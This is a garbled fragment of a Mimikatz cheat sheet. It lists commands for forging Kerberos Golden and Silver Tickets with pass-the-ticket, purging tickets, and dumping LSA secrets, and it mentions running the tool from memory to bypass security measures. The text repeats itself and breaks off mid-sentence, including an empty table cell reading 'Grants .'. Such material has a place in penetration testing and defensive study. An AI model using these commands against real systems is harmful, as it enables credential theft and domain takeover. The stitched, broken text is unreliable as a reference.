: Mimikatz can be executed from memory (bypassing some security measures) or by uploading the executable to the target system.
| Command | Use Case | | :--- | :--- | | kerberos::golden /user:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /id:500 /ptt | Create a Golden Ticket (krbtgt hash required). Grants . | | kerberos::golden /user:USER /domain:DOMAIN /sid:SID /target:TARGET /rc4:HASH /service:cifs /ptt | Create a Silver Ticket (service account hash required). | | kerberos::purge | Clear existing Kerberos tickets before injection. | mimikatz cheatsheet
lsadump::lsa /patch — Dumps LSA secrets, which may include service account credentials. : Mimikatz can be executed from memory (bypassing
Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets. In the hands of a security professional, it is a powerful tool for post-exploitation and auditing Windows security. Mimikatz is an open-source application that allows users